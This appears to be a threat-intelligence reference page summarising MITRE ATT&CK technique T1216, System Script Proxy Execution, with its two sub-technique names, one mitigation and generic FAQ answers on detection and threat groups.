T1216: System Script Proxy Execution — MITRE ATT&CK Technique

Description

Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)

Platforms

Windows

Sub-Techniques (2)

T1216.001

PubPrn

T1216.002

SyncAppvPublishingServer

Mitigations (1)

Execution PreventionM1038

Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application control configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.

References

Frequently Asked Questions

What is T1216 (System Script Proxy Execution)?

T1216 is a MITRE ATT&CK technique named 'System Script Proxy Execution'. It belongs to the Stealth tactic(s). Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default...

How can T1216 be detected?

Detection of T1216 (System Script Proxy Execution) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.

What mitigations exist for T1216?

There are 1 documented mitigations for T1216. Key mitigations include: Execution Prevention.

Which threat groups use T1216?

While specific threat group attribution may vary, this technique has been observed in various real-world attacks. Check the MITRE ATT&CK website for the latest threat intelligence.